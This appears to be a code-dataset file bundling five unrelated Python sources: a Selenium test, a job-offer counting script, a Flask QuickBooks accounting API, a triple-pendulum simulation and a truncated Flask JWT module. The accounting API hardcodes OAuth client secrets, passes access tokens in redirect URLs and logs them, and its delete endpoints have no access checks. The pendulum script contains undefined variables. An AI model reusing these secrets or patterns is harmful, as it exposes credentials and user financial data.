+{"seq_id":"169304815","text":"# -*- coding: utf-8 -*-\n# @Author : chenky\n# @ProjectName :xiaMenWeb\n# @FileName: test_carried_manage.py\n# @Software: PyCharm\n\n\nimport unittest\nfrom selenium import webdriver\nimport time\nfrom pageObject.carriedManagePage import SystemManagePage\n\n\nclass TestCarriedManage(unittest.TestCase):\n @classmethod\n def tearDownClass(cls):\n super().tearDownClass()\n cls.driver.quit()\n\n def tearDown(self):\n super().tearDown()\n\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.driver = webdriver.Firefox()\n cls.carried_page = SystemManagePage(cls.driver)\n cls.driver.get(\"http://62.234.35.213:8080/cx/\")\n cls.carried_page.login_to_system_manage()\n\n def setUp(self):\n super().setUp()\n self.driver.get(\"http://62.234.35.213:8080/cx/\")\n\n def test_01(self):\n \"\"\"验证能正确添加承运人流程\"\"\"\n carried_name = str(round(time.time()))\n self.carried_page.click_system_manage()\n self.carried_page.click_carried_manage()\n self.carried_page.click_add_carried()\n self.carried_page.input_carried_name(carried_name)\n self.carried_page.input_carried_english_name(carried_name)\n self.carried_page.click_sure()\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"testcase/test_carried_manage.py","file_name":"test_carried_manage.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"125714929","text":"instances = int(input())\nscores=[]\nupperLimits=[]\nlowerLimits=[]\narr_num_candidates=[]\nresultval=[]\nresultarray=[]\nvariablelist=[]\n\nfor i in range(instances):\n x=int(input())\n scores.append(x)\n \nqueries_low =int(input())\n\nfor i in range(queries_low):\n y=int(input()) \n lowerLimits.append(y)\n \nqueries_up =int(input())\n\nfor i in range(queries_up):\n z=int(input())\n upperLimits.append(z)\n \ndef jobOffers(scores,lowerLimits,upperLimits):\n for n_queries in range(len(upperLimits)):\n for i_candidate in range(len(scores)):\n if lowerLimits[n_queries]<=scores[i_candidate]<=upperLimits[n_queries]:\n arr_num_candidates.append(scores[i_candidate]) \n variablelist.append(arr_num_candidates)\n print(variablelist)\n res=len(arr_num_candidates) \n resultarray.append(res) \n del arr_num_candidates[:] \n return resultarray\n\nresultval = jobOffers(scores,lowerLimits,upperLimits)\n\nprint(resultval)","sub_path":"hackerrankproblems/TestCandidate.py","file_name":"TestCandidate.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"293891399","text":"import urllib\nimport json\nimport requests\nimport random\nimport base64\nimport os\nimport json\n\nfrom flask import Blueprint, jsonify, request, render_template, redirect, session\nfrom flask_restplus import Namespace, Resource, reqparse, fields\n\nfrom project.api.models import Token, User, Document, Cash_Flow, Balance_Sheet, Profit_Loss\nfrom project import db\n\n'''\nREDIRECT_URI = os.getenv('REDIRECT_URI')\nACCOUNTING_SCOPE = 'com.intuit.quickbooks.accounting'\nCLIENT_ID = 'Q0LH8ItSo4cZCuka8OAiXdbdea5k5vzWRaytOSeplNroZ4jYQi'\nCLIENT_SECRET = 'E5FYXGrL85Xm0UqkqXntZQIMlU3hlP6fhvoUEJQ4'\nSANDBOX_QBO_BASEURL = 'https://sandbox-quickbooks.api.intuit.com'\n'''\n\nREDIRECT_URI = 'http://ec2-54-175-153-92.compute-1.amazonaws.com:5000/accounting/authCodeHandler'\nACCOUNTING_SCOPE = 'com.intuit.quickbooks.accounting'\nCLIENT_ID = 'Q0qlHtvrfP8gWXQQ0y7mY9JqIaya8t3IKPkaXo5VR3GcJjKFZZ'\nCLIENT_SECRET = 'lFMCrPlH6QKirroDcTbynvZlh9J42s8Fnzc5ALiF'\nSANDBOX_QBO_BASEURL = 'https://sandbox-quickbooks.api.intuit.com'\n\n\napi = Namespace('accounting', description='Connect and Get Accounting Data')\n\nreport_fields = api.model('Report', {\n 'report_type': fields.String(description=\"Type of report among balance_sheet, income, cash_flow\", required=True) , \n 'report_id': fields.String(description=\"Id of the specific accounting Report\", required=True)\n})\n\ndocument_fields = api.model('Document', {\n 'uid':fields.String(description=\"User UID\", required=True),\n 'name':fields.String(description=\"Document Name\", required=True),\n 'link':fields.String(description=\"Document Name\", required=True)\n})\n\ncompany_reports = api.model('Reports', {\n 'user_id':fields.String(description=\"User ID\", required=True)\n})\n\n## Switching to Company UID later\n\ncompany_fields = api.model('Company', {\n 'uid':fields.String(description=\"User UID\", required=True),\n 'realmId': fields.String(description=\"Realm Id\", required=True),\n 'access_token': fields.String(description=\"Access Token\", required=True)\n})\n\ndef getRandomString(length, allowed_chars='abcdefghijklmnopqrstuvwxyz' 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'):\n return ''.join(random.choice(allowed_chars) for i in range(length))\n\ndef stringToBase64(s):\n return base64.b64encode(bytes(s, 'utf-8')).decode()\n\ndef getSecretKey():\n chars = 'abcdefghijklmnopqrstuvwxyz0123456789'\n return getRandomString(40, chars)\n\ndef get_CSRF_token(request):\n parser = reqparse.RequestParser()\n parser.add_argument('token', type=str)\n data = parser.parse_args()\n print(request.json)\n token = request.json\n if token is None:\n token = getSecretKey()\n data['csrfToken'] = token\n return token\n\ndef getDiscoveryDocument():\n r = requests.get('https://developer.api.intuit.com/.well-known/openid_sandbox_configuration/')\n if r.status_code >= 400:\n return ''\n discovery_doc_json = r.json()\n discovery_doc = OAuth2Config(\n issuer=discovery_doc_json['issuer'],\n auth_endpoint=discovery_doc_json['authorization_endpoint'],\n userinfo_endpoint=discovery_doc_json['userinfo_endpoint'],\n revoke_endpoint=discovery_doc_json['revocation_endpoint'],\n token_endpoint=discovery_doc_json['token_endpoint'],\n jwks_uri=discovery_doc_json['jwks_uri'])\n return discovery_doc_json\n\n\n@api.route('/uploadDocuments')\nclass Upload(Resource):\n @api.expect(document_fields)\n def post(self):\n data = request.get_json()\n uid = data['uid']\n document_name = data['name']\n document_link = data['link']\n user = User.query.filter_by(uid=data['uid']).first()\n document = Document(user=user,name=document_name, link=document_link)\n db.session.add(document)\n db.session.commit()\n response_object = jsonify({\n 'status':'success',\n 'data': {\n 'user':uid,\n 'document name':document_name,\n 'document link': document_link\n }\n })\n return response_object\n\n\n# Get documents\n@api.route('/documents/')\nclass Documents(Resource):\n def get(self, uid):\n user = User.query.filter_by(uid=uid).first()\n documents = Document.query.filter_by(user_id=user.id)\n response_data = []\n for document in documents:\n response_data.append({\n \"id\":document.id,\n \"user_id\":document.user_id,\n \"name\":document.name,\n \"link\":document.link\n })\n response = jsonify(response_data)\n return response\n\n\n# Delete Account\n@api.route('/documents/')\nclass DeleteDocument(Resource):\n def delete(self, id):\n document = Document.query.get(id)\n db.session.delete(document)\n try:\n db.session.commit()\n \n response = jsonify({\n 'status':'success',\n 'message':'Successfully deleted document'\n })\n return response\n except:\n db.session.rollback()\n raise\n response = jsonify({\n 'status':'fail',\n 'message':'Document does not exist'\n })\n\n\n# @api.route('/recon')\n# class Recon(Resource):\n# def get(self):\n# discoveryDocument = getDiscoveryDocument()\n# response_object = jsonify({\n# 'status':'success',\n# 'data':discoveryDocument\n# })\n# return response_object\n\n@api.route('/connectToQuickbooks')\nclass Connecting(Resource):\n def get(self):\n url = 'https://appcenter.intuit.com/connect/oauth2'\n params = {\n 'scope': ACCOUNTING_SCOPE,\n 'redirect_uri': REDIRECT_URI,\n 'response_type': 'code', \n 'state': get_CSRF_token(request), \n 'client_id': CLIENT_ID\n }\n url += '?' + urllib.parse.urlencode(params)\n response_object = jsonify({\n 'status':'success',\n 'message': 'Successfully connecting to Quickbooks',\n 'data': url\n })\n response_object.status_code = 200\n return response_object\n\n@api.route('/authCodeHandler')\nclass Authorization(Resource):\n def get(self):\n \"\"\" Authorization Code Handler \"\"\"\n parser = reqparse.RequestParser()\n parser.add_argument('state', type=str)\n parser.add_argument('code', type=str)\n parser.add_argument('realmId', type=str)\n data = parser.parse_args()\n print(\"Auth Code are:%s\"%data['code'])\n auth_code = data['code']\n realmId = data['realmId']\n token_endpoint = 'https://oauth.platform.intuit.com/oauth2/v1/tokens/bearer'\n auth_header = 'Basic ' + stringToBase64(CLIENT_ID + ':' + CLIENT_SECRET)\n headers = {'Accept': 'application/json', 'content-type': 'application/x-www-form-urlencoded',\n 'Authorization': auth_header}\n payload = {\n 'grant_type': 'authorization_code',\n 'code': auth_code,\n 'redirect_uri': REDIRECT_URI\n }\n print(payload)\n r = requests.post(token_endpoint, data=payload, headers=headers)\n data = json.loads(r.text)\n print(\"OUR TOKEN RESPONSE ARE: %s\"%(data))\n if r.status_code == 400:\n response_object = jsonify({\n 'status':'fail',\n 'messsage': 'Not getting access code',\n 'data': data\n })\n else:\n response_object = jsonify({\n 'status':'success',\n 'message': 'Successfully receive and save code',\n 'data': {\n 'refresh_token_expires_in':data['x_refresh_token_expires_in'],\n 'refresh_token':data['refresh_token'],\n 'access_token':data['access_token'],\n 'token_type':data['token_type'],\n 'expires_in':data['expires_in'],\n 'realmId':realmId\n }\n })\n print(\"ACCOUNTING: %s\"%(response_object.data))\n access_token = data['access_token']\n return redirect('http://ec2-54-172-36-185.compute-1.amazonaws.com/quickbooks?status=success&message=ok&access_token=%s&realmId=%s'%(access_token, realmId),code=302)\n\n@api.route('/apiCall/companyInfo')\nclass companyInfo(Resource):\n @api.expect(company_fields)\n def post(self):\n \"\"\" Making a specific API call \"\"\"\n data = request.get_json()\n print(data['realmId'], data['access_token'], data['uid'])\n user = User.query.filter_by(uid=data['uid']).first()\n user.quickbook_access_token = data['access_token']\n user.quickbook_id = data['realmId']\n db.session.add(user)\n db.session.commit()\n route = 'https://sandbox-quickbooks.api.intuit.com/v3/company/{0}/companyinfo/{0}'.format(data['realmId'])\n print(route)\n auth_header = 'Bearer ' + data['access_token']\n headers = {'Authorization': auth_header, 'accept': 'application/json'}\n r = requests.get(route, headers=headers)\n print(\"COMPANY RESPONSE: %s\"%(r.text))\n status_code = r.status_code\n if status_code != 200:\n response = ''\n return response, status_code\n response = json.loads(r.text)\n return response, status_code\n\n## Balance Sheet\n@api.route('/apiCall/BalanceSheet')\nclass BalanceSheet(Resource):\n @api.expect(company_fields)\n def post(self):\n \"\"\" Making a specific API call \"\"\"\n data = request.get_json()\n print('BALANCE SHEET---------------')\n print(data)\n print(data['realmId'], data['access_token'])\n route = 'https://sandbox-quickbooks.api.intuit.com/v3/company/{0}/reports/BalanceSheet?minorversion=4'.format(data['realmId'])\n print(route)\n auth_header = 'Bearer ' + data['access_token']\n headers = {'Authorization': auth_header, 'accept': 'application/json'}\n r = requests.get(route, headers=headers)\n print(\"COMPANY RESPONSE: %s\"%(r.text))\n status_code = r.status_code\n if status_code != 200:\n response = ''\n return response, status_code\n response = json.loads(r.text)\n\n user = User.query.filter_by(uid=data['uid']).first()\n report_name = response['Header']['ReportName']\n startPeriod = response['Header']['StartPeriod']\n endPeriod = response['Header']['EndPeriod']\n current_asset = response['Rows']['Row'][0]['Rows']['Row'][0]['Summary']['ColData'][1]['value']\n fixed_asset = response['Rows']['Row'][0]['Rows']['Row'][1]['Summary']['ColData'][1]['value']\n current_liability = response['Rows']['Row'][1]['Rows']['Row'][0]['Rows']['Row'][0]['Summary']['ColData'][1]['value']\n longterm_liability = response['Rows']['Row'][1]['Rows']['Row'][0]['Rows']['Row'][0]['Summary']['ColData'][1]['value']\n equity = response['Rows']['Row'][1]['Rows']['Row'][1]['Summary']['ColData'][1]['value']\n\n balance_sheet_report = Balance_Sheet(\n user = user,\n report_name = report_name,\n startPeriod = startPeriod,\n endPeriod = endPeriod,\n current_asset = current_asset,\n fixed_asset = fixed_asset,\n current_liability = current_liability,\n longterm_liability = longterm_liability,\n equity = equity\n )\n\n db.session.add(balance_sheet_report)\n db.session.commit()\n response_object = jsonify({\n 'account': data['realmId'],\n 'report_name': report_name,\n 'startPeriod': startPeriod,\n 'endPeriod':endPeriod,\n 'current_asset': current_asset,\n 'fixed_asset':fixed_asset,\n 'current_liability':current_liability,\n 'longterm_liability':longterm_liability,\n 'equity': equity\n })\n response_object.status_code = 200\n return response_object\n\n\n## Cash Flow \n@api.route('/apiCall/CashFlow')\nclass CashFlow(Resource):\n @api.expect(company_fields)\n def post(self):\n \"\"\" Making a specific API call \"\"\"\n data = request.get_json()\n print(data['realmId'], data['access_token'])\n route = 'https://sandbox-quickbooks.api.intuit.com/v3/company/{0}/reports/CashFlow?minorversion=4'.format(data['realmId'])\n print(route)\n auth_header = 'Bearer ' + data['access_token']\n headers = {'Authorization': auth_header, 'accept': 'application/json'}\n r = requests.get(route, headers=headers)\n print(\"COMPANY RESPONSE: %s\"%(r.text))\n status_code = r.status_code\n if status_code != 200:\n response = ''\n return response, status_code\n response = json.loads(r.text)\n\n user = User.query.filter_by(uid=data['uid']).first()\n report_name = response['Header']['ReportName']\n startPeriod = response['Header']['StartPeriod']\n endPeriod = response['Header']['EndPeriod']\n beginningCash = response['Rows']['Row'][4]['ColData'][1]['value']\n endingCash = response['Rows']['Row'][5]['Summary']['ColData'][1]['value']\n operatingNetCash = response['Rows']['Row'][0]['Summary']['ColData'][1]['value']\n investingNetCash = response['Rows']['Row'][1]['Summary']['ColData'][1]['value']\n financingNetCash = response['Rows']['Row'][2]['Summary']['ColData'][1]['value']\n print(\"INSERTING TO DATABASES\")\n cashFlowReport = Cash_Flow(\n user=user,\n report_name=report_name, \n startPeriod=startPeriod, \n endPeriod=endPeriod, \n beginningCash=beginningCash, \n endingCash=endingCash,\n operatingNetCash=operatingNetCash,\n investingNetCash=investingNetCash,\n financingNetCash=financingNetCash\n )\n db.session.add(cashFlowReport)\n db.session.commit()\n response_object = jsonify({\n 'report_name':report_name,\n 'startPeriod':startPeriod,\n 'endPeriod':endPeriod,\n 'beginningCash':beginningCash, \n 'endingCash':endingCash,\n 'operatingNetCash':operatingNetCash,\n 'investingNetCash':investingNetCash,\n 'financingNetCash':financingNetCash\n })\n response_object.status_code = 200\n return response_object\n\n## Profit and Los\n@api.route('/apiCall/ProfitAndLoss')\nclass ProfitAndLoss(Resource):\n @api.expect(company_fields)\n def post(self):\n \"\"\" Making a specific API call \"\"\"\n data = request.get_json()\n print(data)\n print(data['realmId'], data['access_token'], data['uid'])\n route = 'https://sandbox-quickbooks.api.intuit.com/v3/company/{0}/reports/ProfitAndLoss?minorversion=4'.format(data['realmId'])\n print(route)\n auth_header = 'Bearer ' + data['access_token']\n headers = {'Authorization': auth_header, 'accept': 'application/json'}\n r = requests.get(route, headers=headers)\n print(\"COMPANY RESPONSE: %s\"%(r.text))\n status_code = r.status_code\n if status_code != 200:\n response = ''\n return response, status_code\n response = json.loads(r.text)\n\n\n\n user = User.query.filter_by(uid=data['uid']).first()\n report_name = response['Header']['ReportName']\n startPeriod = response['Header']['StartPeriod']\n endPeriod = response['Header']['EndPeriod']\n income = response['Rows']['Row'][0]['Summary']['ColData'][1]['value']\n COGS = response['Rows']['Row'][1]['Summary']['ColData'][1]['value']\n grossProfit = response['Rows']['Row'][2]['Summary']['ColData'][1]['value']\n expenses = response['Rows']['Row'][3]['Summary']['ColData'][1]['value']\n netOperatingIncome = response['Rows']['Row'][4]['Summary']['ColData'][1]['value']\n otherExpenses = response['Rows']['Row'][5]['Summary']['ColData'][1]['value']\n netOtherIncome = response['Rows']['Row'][6]['Summary']['ColData'][1]['value']\n netIncome = response['Rows']['Row'][7]['Summary']['ColData'][1]['value']\n\n\n profit_loss_report = Profit_Loss(\n user = user,\n report_name = report_name,\n startPeriod = startPeriod,\n endPeriod = endPeriod,\n income = income,\n COGS = COGS,\n grossProfit = grossProfit,\n expenses = expenses,\n netOperatingIncome = netOperatingIncome,\n otherExpenses = otherExpenses,\n netOtherIncome = netOtherIncome,\n netIncome = netIncome\n )\n db.session.add(profit_loss_report)\n db.session.commit()\n \n response_object = jsonify({\n 'user uid': data['uid'],\n 'report_name':report_name,\n 'startPeriod':startPeriod,\n 'endPeriod':endPeriod,\n 'income' : income,\n 'COGS': COGS,\n 'grossProfit' :grossProfit,\n 'expenses':expenses,\n 'netOperatingIncome': netOperatingIncome,\n 'otherExpenses':otherExpenses,\n 'netOtherIncome':netOtherIncome,\n 'netIncome':netIncome\n })\n response_object.status_code = 200\n return response_object\n\n@api.route('/accountingReport')\nclass AllReport(Resource):\n @api.expect(company_reports)\n def post(self):\n \"\"\"Get Request to Display All Accounting Reports Belong to An User\"\"\"\n data = request.get_json()\n print(\"HERE IS THE REQUEST CONTENT\")\n print(data)\n uid = data['user_id']\n\n ## Pulling newest reports from Quickbook\n our_user = User.query.filter_by(uid=uid).first()\n user_id = our_user.id\n access_token = our_user.quickbook_access_token\n realmId = our_user.quickbook_id\n\n ## \n def pull_quickbook_report(report_name,uid,access_token, realmId):\n route = 'http://ec2-54-175-153-92.compute-1.amazonaws.com:5000/accounting/apiCall/'+report_name\n r = requests.post(route, data={'uid':uid, 'realmId':realmId, 'access_token':access_token}) \n\n ## Pulling Three Reports from QuickBook and Insert into DB\n pull_quickbook_report('BalanceSheet', uid, access_token, realmId)\n pull_quickbook_report('CashFlow', uid, access_token, realmId)\n pull_quickbook_report('ProfitAndLoss', uid, access_token, realmId)\n\n ## Query to DB\n balance_sheet = Balance_Sheet.query.filter_by(user_id=user_id).first()\n cash_flow = Cash_Flow.query.filter_by(user_id=user_id).first()\n profit_loss = Profit_Loss.query.filter_by(user_id=user_id).first()\n\n print('BEFORE RESPONSE----')\n response = jsonify([])\n if balance_sheet:\n response = jsonify([\n {\n \"report_name\":balance_sheet.report_name, \n \"start_date\":balance_sheet.startPeriod, \n \"account\":balance_sheet.id\n }\n ])\n print('RESPONSE-------')\n print(response)\n\n return response\n\n@api.route('/deleteReport')\nclass deleteReport(Resource):\n @api.expect(report_fields)\n def delete(self):\n \"\"\"Post Request to Delete Report by Type & ID\"\"\"\n\n ## Parsing data from Request\n data = request.get_json()\n account_type = data['report_type']\n report_id = int(data['report_id'])\n user_pick = \"Not pick yet\"\n\n # Delete from DB \n def delete_report(report_object):\n if report_object:\n db.session.delete(report_object)\n try:\n db.session.commit()\n print(\"Deleted from db\")\n except:\n db.session.rollback()\n raise\n response = jsonify({\n 'status':'success', \n 'message': 'Successfully delete accounting report'\n })\n response.status_code = 200\n return response\n else:\n response = jsonify({\n 'status':'fail',\n 'message': 'Fail to delete the report',\n 'status_code': 401\n })\n return response\n\n # ## Decide Which Type of Report to Delete\n if account_type == \"balance_sheet\":\n balance_sheet_report = Balance_Sheet.query.filter_by(id=report_id).first()\n return delete_report(balance_sheet_report)\n\n elif account_type == \"income\":\n income_report = Profit_Loss.query.filter_by(id=report_id).first()\n return delete_report(income_report)\n\n elif account_type == \"cashflow\":\n cash_flow = Cash_Flow.query.filter_by(id=report_id).first()\n return delete_report(cash_flow)\n \n else:\n user_pick = \"Not correct report type please pick one from balance_sheet, cashflow, income\" \n\n# @api.route('/connected')\n# class Connected(Resource):\n# pass\n\n# @api.route('/disconnect')\n# class Disconnect(Resource):\n# def get(self):\n# \"\"\" Disconnect from Quick Book Online \"\"\"\n# return \"Disconnected from Quickbook\", 200\n\n# @api.route('/refreshTokenCall')\n# class refreshToken(Resource):\n# def get(self):\n# \"\"\" Refresh Access Token \"\"\"\n# return \"Refreshing access token\", 200\n\n\n\n\n\n\n\n\n\n","sub_path":"project/api/accounting.py","file_name":"accounting.py","file_ext":"py","file_size_in_byte":21429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"150630342","text":"from numpy import array, zeros, eye, asarray, dot, rad2deg, deg2rad, linspace, sin, cos, pi\nfrom matplotlib.pyplot import plot, xlabel, ylabel, legend, rcParams\nfrom sympy import symbols\nfrom sympy.physics.mechanics import dynamicsymbols, ReferenceFrame, Point, inertia, RigidBody, KanesMethod\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.integrate import odeint\nfrom pydy.codegen.code import generate_ode_function\nimport matplotlib.animation as animation\n#from utils import controllable\n\n#Sets up inertial frame as well as frames for each linkage\ninertial_frame = ReferenceFrame('I')\nr_leg_frame = ReferenceFrame('R')\nbody_frame = ReferenceFrame('B')\nl_leg_frame = ReferenceFrame('L')\n\n#Sets up symbols for joint angles\ntheta1, theta2, theta3 = dynamicsymbols('theta1, theta2, theta3')\n\n#Orients the left leg frame to the inertial frame by angle theta1\n#and the body frame to to the leg frame by angle theta2\n#and the right leg frame to the body frame by theta3\nl_leg_frame.orient(inertial_frame, 'Axis', (theta1, inertial_frame.z))\nbody_frame.orient(l_leg_frame, 'Axis', (theta2, l_leg_frame.z))\nr_leg_frame.orient(body_frame, 'Axis', (theta3, body_frame.z))\n\n#Sets up points for the joints and places them relative to each other\nl_ankle = Point('LA')\nl_leg_length = symbols('l_L')\nl_hip = Point('LH')\nl_hip.set_pos(l_ankle, l_leg_length*l_leg_frame.y)\nhip_width = symbols('h_W')\nr_hip = Point('RH')\nr_hip.set_pos(l_hip, hip_width*body_frame.y)\n\n#Sets up the centers of mass of each of the linkages\nr_leg_com_length, body_com_length, l_leg_com_length = symbols('d_RL, d_B, d_LL')\nl_leg_mass_center = Point('LL_o')\nl_leg_mass_center.set_pos(l_ankle, l_leg_com_length*l_leg_frame.y)\nbody_mass_center = Point('B_o')\nbody_mass_center.set_pos(l_hip, body_com_length*body_frame.y)\nr_leg_mass_center = Point('RL_o')\nr_leg_mass_center.set_pos(r_hip, l_leg_com_length*r_leg_frame.y)\n\n#Sets up the angular velocities\nomega1, omega2, omega3 = dynamicsymbols('omega1, omega2, omega3')\n#Relates angular velocity values to the angular positions theta1 and theta2\nkinematic_differential_equations = [omega1 - theta1.diff(),\n omega2 - theta2.diff(),\n omega3 - theta3.diff()]\n\n#Sets up the rotational axes of the angular velocities\nl_leg_frame.set_ang_vel(inertial_frame, omega1*inertial_frame.z)\nl_leg_frame.ang_vel_in(inertial_frame)\nbody_frame.set_ang_vel(l_leg_frame, omega2*inertial_frame.z)\nbody_frame.ang_vel_in(inertial_frame)\nr_leg_frame.set_ang_vel(body_frame, omega3*inertial_frame.z)\nr_leg_frame.ang_vel_in(inertial_frame)\n\n#Sets up the linear velocities of the points on the linkages\nl_ankle.set_vel(inertial_frame, 0)\nl_leg_mass_center.v2pt_theory(l_ankle, inertial_frame, l_leg_frame)\nl_leg_mass_center.vel(inertial_frame)\nl_hip.v2pt_theory(l_ankle, inertial_frame, l_leg_frame)\nl_hip.vel(inertial_frame)\nbody_mass_center.v2pt_theory(l_hip, inertial_frame, body_frame)\nbody_mass_center.vel(inertial_frame)\nr_hip.v2pt_theory(l_hip, inertial_frame, body_frame)\nr_hip.vel(inertial_frame)\nr_leg_mass_center.v2pt_theory(r_hip, inertial_frame, r_leg_frame)\nr_leg_mass_center.vel(inertial_frame)\n\n#Sets up the masses of the linkages\nl_leg_mass, body_mass, r_leg_mass = symbols('m_LL, m_B, m_RL')\n\n#Sets up the rotational inertia of the linkages\nl_leg_inertia, body_inertia, r_leg_inertia = symbols('I_LLz, I_Bz, I_RLz')\n\n#Sets up inertia dyadics\nl_leg_inertia_dyadic = inertia(l_leg_frame, 0, 0, l_leg_inertia)\nl_leg_central_inertia = (l_leg_inertia_dyadic, l_leg_mass_center)\n\nbody_inertia_dyadic = inertia(body_frame, 0, 0, body_inertia)\nbody_central_inertia = (body_inertia_dyadic, body_mass_center)\n\nr_leg_inertia_dyadic = inertia(r_leg_frame, 0, 0, r_leg_inertia)\nr_leg_central_inertia = (r_leg_inertia_dyadic, r_leg_mass_center)\n\n#Defines the linkages as rigid bodies\nl_leg = RigidBody('Left Leg', l_leg_mass_center, l_leg_frame, l_leg_mass, l_leg_central_inertia)\nbody = RigidBody('Body', body_mass_center, body_frame, body_mass, body_central_inertia)\nr_leg = RigidBody('Right Leg', r_leg_mass_center, r_leg_frame, r_leg_mass, r_leg_central_inertia)\n\n#Sets up gravity information and assigns gravity to act on mass centers\ng = symbols('g')\nl_leg_grav_force_vector = -l_leg_mass*g*inertial_frame.y\nl_leg_grav_force = (l_leg_mass_center, l_leg_grav_force_vector)\nbody_grav_force_vector = -body_mass*g*inertial_frame.y\nbody_grav_force = (body_mass_center,body_grav_force_vector)\nr_leg_grav_force_vector = -r_leg_mass*g*inertial_frame.y\nr_leg_grav_force = (r_leg_mass_center, r_leg_grav_force_vector)\n\n#Sets up joint torques\nl_ankle_torque, l_hip_torque, r_hip_torque = dynamicsymbols('T_la, T_lh, T_rh')\nl_ankle_torque_vector = l_ankle_torque*inertial_frame.z - l_hip_torque*inertial_frame.z\nl_ankle_torque = (l_leg_frame, l_ankle_torque_vector)\n\nl_hip_torque_vector = l_hip_torque*inertial_frame.z - r_hip_torque*inertial_frame.z\nl_hip_torque = (body_frame, l_hip_torque_vector)\n\nr_hip_torque_vector = r_hip_torque*inertial_frame.z\nr_hip_torque = (r_leg_frame, r_hip_torque_vector)\n\n#Generalized coordinates\ncoordinates = [theta1, theta2, theta3]\n\n#Generalized speeds\nspeeds = [omega1, omega2, omega3]\n\n#Create a KanesMethod object\nkane = KanesMethod(inertial_frame, coordinates, speeds, kinematic_differential_equations)\n\nloads = [l_leg_grav_force,\n body_grav_force,\n r_leg_grav_force,\n l_ankle_torque,\n l_hip_torque,\n r_hip_torque]\nbodies = [l_leg, body, r_leg]\n\nfr, frstar = kane.kanes_equations(loads, bodies)\n\nmass_matrix = kane.mass_matrix_full\n\nforcing_vector = kane.forcing_full\n\nrcParams['figure.figsize'] = (14.0, 6.0)\n\nconstants = [l_leg_length,\n l_leg_com_length,\n l_leg_mass,\n l_leg_inertia,\n hip_width,\n body_com_length,\n body_mass,\n body_inertia,\n r_leg_com_length,\n r_leg_mass,\n r_leg_inertia,\n g]\n\ncoordinates = [theta1, theta2, theta3]\n\nspeeds = [omega1, omega2, omega3]\n\n#Specified contains the matrix for the input torques\nspecified = [l_ankle_torque, l_hip_torque, r_hip_torque]\n\nright_hand_side = generate_ode_function(mass_matrix, forcing_vector,\n constants,\n coordinates, speeds, specified)\n\n#Initial Conditions for speeds and positions\nx0 = zeros(6)\n#x0[:3] = deg2rad(2.0)\n\n#Specifies numerical constants for inertial/mass properties\nnumerical_constants = array([0.611, # l_leg_length[m]\n 0.387, # l_leg_com_length[m]\n 6.769, # l_leg_mass[kg]\n 0.101, # l_leg_inertia [kg*m^2]\n 0.424, # hip_width [m]\n 0.193, # body_com_length [m]\n 17.01, # body_mass[kg]\n 0.282, # body_inertia [kg*m^2]\n 0.305, # r_leg_com_length [m]\n 32.44, # r_leg_mass [kg]\n 1.485, # r_leg_inertia [kg*m^2]\n 9.81], # acceleration due to gravity [m/s^2]\n )\n#Set input torques to 0\nnumerical_specified = zeros(3)\n\nargs = {'constants': numerical_constants,\n 'specified': numerical_specified}\n\nframes_per_sec = 60\nfinal_time = 5.0\n\nt = linspace(0.0, final_time, final_time*frames_per_sec)\n\nright_hand_side(x0, 0.0, args)\n\ny = odeint(right_hand_side, x0, t, args=(args,))\n\nLA_x = numerical_constants[0]*sin(y[:,0])\nLA_y = numerical_constants[0]*cos(y[:,0])\n\nRH_x = LA_x + numerical_constants[4]*sin(y[:,1])\nRH_y = LA_y + numerical_constants[4]*cos(y[:,1])\n\nRA_x = RH_x + numerical_constants[7]*2*sin(y[:,2])\nRA_y = RH_y + numerical_constants[7]*2*cos(y[:,2])\n\ndt = 0.05\n\nfig = plt.figure()\nax = fig.add_subplot(111, autoscale_on=False,aspect='equal', xlim = (-2, 2), ylim = (-2, 2))\nax.grid()\n\nline, = ax.plot([], [], 'o-', lw=2)\ntime_template = 'time=%.1fs'\ntime_text = ax.text(0.05, 0.9, '', transform=ax.transAxes)\n\ndef init():\n line.set_data([],[])\n time_text.set_text('')\n return line, time_text\n\ndef animate(i):\n thisx = [0, LA_X[i], RH_X[i], RA_X[i]]\n thisy = [0, LA_Y[i], RH_Y[i], RA_Y[i]]\n\n line.set_data(thisx, thisy)\n time_text.set_text(time_template%(i*dt))\n return line, time_text\n\nani = animation.FuncAnimation(fig, animate, np.arange(1, len(y)), interval=25, blit=True, init_func=init)\n#ani.save('double_pendulum.mp4')\nplt.show()\n\n#plot(t, rad2deg(y[:,:3]))\n#xlabel('Time [s]')\n#ylabel('Angle[deg]')\n#legend([\"${}$\".format(vlatex(c)) for c in coordinates])\n#plt.show()\n\n#plot(t, rad2deg(y[:, 3:]))\n#xlabel('Time [s]')\n#ylabel('Angular Rate [deg/s]')\n#legend([\"${}$\".format(vlatex(s)) for s in speeds])\n#plt.show()\n","sub_path":"Triple_pendulum/triple_pendulum.py","file_name":"triple_pendulum.py","file_ext":"py","file_size_in_byte":8838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"593393130","text":"from flask import jsonify\nfrom flask_jwt_extended import jwt_required, jwt_optional\n\nfrom backend.core.backend_app import FormsBackend\n\n\ndef application_extend(application: FormsBackend):\n from backend.core.models import Users\n from backend.core.enums import UsersRole\n from flask_jwt_extended import get_current_user\n\n @application.jwt.token_in_blacklist_loader\n def check_if_token_in_blacklist(decrypted_token):\n jti = decrypted_token['jti']\n\n model = application.orm.get_token_by_jti(jti)\n if not model:\n return False\n if model.revoked:\n return True\n\n return False\n\n @application.jwt.user_loader_callback_loader\n def fetch_user(identity) -> Users:\n user_auth = application.orm.get_user_auth_by_email(identity)\n\n return user_auth.user\n\n @application.app.before_request\n @jwt_optional\n def log_request():\n from flask import request\n\n user: Users = get_current_user()\n if user is not None:\n roles = [UsersRole.MANAGER, UsersRole.STAFF]\n\n if user.role == roles[0].value or user.role == roles[1].value:\n method = request.method\n path = request.path\n data = request.get_json()\n\n application.orm.add_log(user.id, user.role, method, path, data)\n\n @application.app.errorhandler(422)\n def handle_error(err):\n headers = err.data.get(\"headers\", None)\n messages = err.data.get(\"messages\", 